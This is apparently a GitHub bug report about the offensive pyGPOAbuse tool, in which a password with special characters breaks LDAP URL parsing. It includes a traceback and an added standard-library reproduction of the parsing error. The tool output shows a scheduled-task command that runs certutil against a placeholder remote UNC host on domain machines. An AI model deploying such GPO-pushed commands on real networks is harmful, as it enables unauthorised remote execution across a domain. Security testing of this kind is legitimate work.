pyGPOAbuse
GPO modification succeeds but barfs error
I ran this on an engagement where my low-priv account has a really long password that follows the format of: A long password with a number like 1 and then a period. AND THEN ALL CAPS FOR REST OF PASSWORD. When I run pygpoabuse to modify the task, it looks like it succeeds (the task XML file gets created but doesn't ever fire, which I'll troubleshoot separately). But the script gives a huge dump of errors right after the ScheduledTasks.xml gets saved:
```
<snip>
[*] c:\windows\system32\cmd.exe /c "certutil -syncwithwu \\x.x.x.x"
DEBUG:root:ScheduledTasks.xml has been saved
[*] ScheduledTasks.xml has been saved
DEBUG:asyncio:Using selector: EpollSelector
[*] Using selector: EpollSelector
ERROR:root:An error occurred. Use -vv for more details
Traceback (most recent call last):
File "/opt/tools/pyGPOAbuse/pygpoabuse.py", line 148, in <module>
if gpo.update_versions(url, domain, options.gpo_id, gpo_type="user" if options.user else "computer",):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/pygpoabuse/gpo.py", line 112, in update_versions
updated_version = asyncio.run(self.update_ldap(url, domain, gpo_id, gpo_type))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/asyncio/base_events.py", line 654, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/pygpoabuse/gpo.py", line 81, in update_ldap
ldap = Ldap(url, gpo_id, domain)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/pygpoabuse/ldap.py", line 12, in __init__
conn_url = LDAPConnectionFactory.from_url(url)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/venv/lib/python3.11/site-packages/msldap/commons/factory.py", line 79, in from_url
target = MSLDAPTarget.from_url(connection_url)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/venv/lib/python3.11/site-packages/msldap/commons/target.py", line 93, in from_url
if url_e.port:
^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/urllib/parse.py", line 182, in port
raise ValueError(f"Port could not be cast to integer value as {port!r}")
ValueError: Port could not be cast to integer value as 'A long password with a number like 1 and then a period. AND THEN ALL CAPS FOR REST OF PASSWORD.'
[x] An error occurred. Use -vv for more details
```
(I was already running -vv)
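
Added example, not part of the original report or of pyGPOAbuse's code: a standard-library reproduction of one way the `ValueError` in the traceback can arise, namely a password containing `/`, `?` or `#` placed unencoded in a connection URL, next to the same URL with percent-encoded userinfo. The account, host and password are constructed; that the reported password contained such a character, and that the consuming library percent-decodes userinfo, are assumptions the page does not confirm.

```python
from urllib.parse import quote, unquote, urlsplit

# Constructed sample values (assumptions, not taken from the report).
USER = "CORP\\lowpriv"
HOST = "dc01.corp.example"
PASSWORD = "A long passphrase with 1 number. THEN CAPS #1/2?"


def build_url(user, password, host, encode):
    """Build an ldap:// URL, optionally percent-encoding the userinfo part."""
    if encode:
        # safe="" forces every reserved character (/, ?, #, :, @, \) to %XX.
        user = quote(user, safe="")
        password = quote(password, safe="")
    return f"ldap://{user}:{password}@{host}"


def parse(url):
    """Return (username, password, hostname, port) or ("error", message)."""
    parts = urlsplit(url)
    try:
        port = parts.port  # raises ValueError when the "port" is not numeric
    except ValueError as exc:
        return ("error", str(exc))
    return (
        unquote(parts.username or ""),
        unquote(parts.password or ""),
        parts.hostname,
        port,
    )


def demo():
    raw = build_url(USER, PASSWORD, HOST, encode=False)
    enc = build_url(USER, PASSWORD, HOST, encode=True)
    # Raw: the netloc ends at the first '#', so "@host" lands in the fragment
    # and everything after the first ':' is treated as the port.
    # Encoded: the netloc stays whole and unquote() restores the credentials.
    return parse(raw), parse(enc)


if __name__ == "__main__":
    for result in demo():
        print(result)
```
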